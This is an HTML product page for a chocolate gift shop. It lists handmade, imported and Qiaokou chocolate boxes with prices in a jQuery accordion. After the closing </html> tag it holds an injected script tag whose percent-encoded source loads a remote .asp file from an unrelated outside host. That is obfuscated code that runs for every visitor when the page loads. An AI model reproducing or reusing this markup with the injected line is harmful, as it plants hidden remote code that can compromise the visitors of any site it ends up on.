<!DOCTYPE html>
<html>
	<head>
		<meta charset="UTF-8">
		<title></title>
		<style type="text/css">
			*{
				margin: 0;
				padding: 0;
			}
			.wrap{
				width: 960px;
			}
			.accordion{
				padding: 10px;
			}
			.accordion>p{
				background: #ccc;
				color: #333;
				padding: 0 10px;
				line-height: 26px;
				margin-top: 5px;clear: both;
			}
			.accordion>p.active{
				background: orangered;
				color: #fff;
			}
			.accordion>p em{
				margin-right: 10px;
			}
			.accordion>div, .accordion>ul{
				display: none;
			}
			.accordion>ul{
				list-style: none;
				padding-left: 20px;
			}
			.accordion>ul li{
				padding: 10px;
				line-height: 26px;float: left;height: 265px;
				font-size: 12px;
				text-align: center;
			}
		</style>
	</head>
	<body>
		<div class="wrap">
			<div class="accordion">
					<p><em class="iconfont icon-add"></em>手工巧克力</p>
					<ul>
						<li><img src="img/chocolate/shougong1.jpg" width="200" /><br />￥158 <br />奢悦之美巧克力礼盒</li>
						<li><img src="img/chocolate/shougong2.jpg" width="200" /><br />￥128 <br />花样年华巧克力礼盒</li>
						<li><img src="img/chocolate/shougong3.jpg" width="200" /><br />￥119 <br />棒棒糖形手工纯脂巧克力礼盒</li>
						<li><img src="img/chocolate/shougong4.jpg" width="200" /><br />￥79 <br />美满良缘巧克力礼盒</li>
						<li><img src="img/chocolate/shougong5.jpg" width="200" /><br />￥89 <br />幻梦唯爱纯手工巧克力礼盒</li>
						<li><img src="img/chocolate/shougong6.jpg" width="200" /><br />￥99 <br />玫瑰之约手工巧克力礼盒</li>
					</ul>
					<p><em class="iconfont icon-add"></em>进口巧克力</p>
					<ul>
						<li><img src="img/chocolate/jinkou1.jpg" width="200"/><br />￥348 <br />felchin18粒精装巧克力礼盒</li>
						<li><img src="img/chocolate/jinkou2.jpg" width="200"/><br />￥298 <br />felchin16粒精装巧克力礼盒</li>
						<li><img src="img/chocolate/jinkou3.jpg" width="200"/><br />￥238 <br />felchin12粒精装巧克力礼盒</li>
						<li><img src="img/chocolate/jinkou4.jpg" width="200"/><br />￥268 <br />felchin8粒心形巧克力礼盒</li>
					</ul>
					<p><em class="iconfont icon-add"></em>巧寇巧克力</p>
					<ul>
						<li><img src="img/chocolate/qiaokou1.jpg" width="200" /><br />￥298 <br />巧克巧蔻创意心形礼盒</li>
						<li><img src="img/chocolate/qiaokou2.jpg" width="200" /><br />￥258 <br />巧克巧蔻16粒手工夹心礼盒</li>
						<li><img src="img/chocolate/qiaokou3.jpg" width="200" /><br />￥148 <br />巧克巧蔻9粒手工夹心礼盒</li>
						<li><img src="img/chocolate/qiaokou4.jpg" width="200" /><br />￥98 <br />巧克巧蔻定96%黑巧克力礼盒</li>
						<li><img src="img/chocolate/qiaokou5.jpg" width="200" /><br />￥189 <br />七夕巧克力小食瓶礼盒</li>
						<li><img src="img/chocolate/qiaokou6.jpg" width="200" /><br />￥298 <br />巧克巧蔻12星座礼盒</li>
						<li><img src="img/chocolate/qiaokou7.jpg" width="200" /><br />￥135 <br />巧克巧嫁给我系列礼盒</li>
					    <li><img src="img/chocolate/qiaokou8.jpg" width="200" /><br />￥158 <br />巧克巧蔻情人节礼盒</li>
					</ul>
			</div>
		</div>
		
		<script type="text/javascript" src="js/jquery.min.js"></script>
		<script type="text/javascript">
			$(".accordion>p").click(function(){
				if($(this).hasClass("active")){
					$(this).find("em").removeClass("icon-jian").addClass("icon-add");
					$(this).removeClass("active").next().slideUp();
				}
				else{
					$(this).find("em").removeClass("icon-add").addClass("icon-jian");
					$(this).addClass("active").next().slideDown();
				}
			});
		</script>
	</body>
</html>
<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>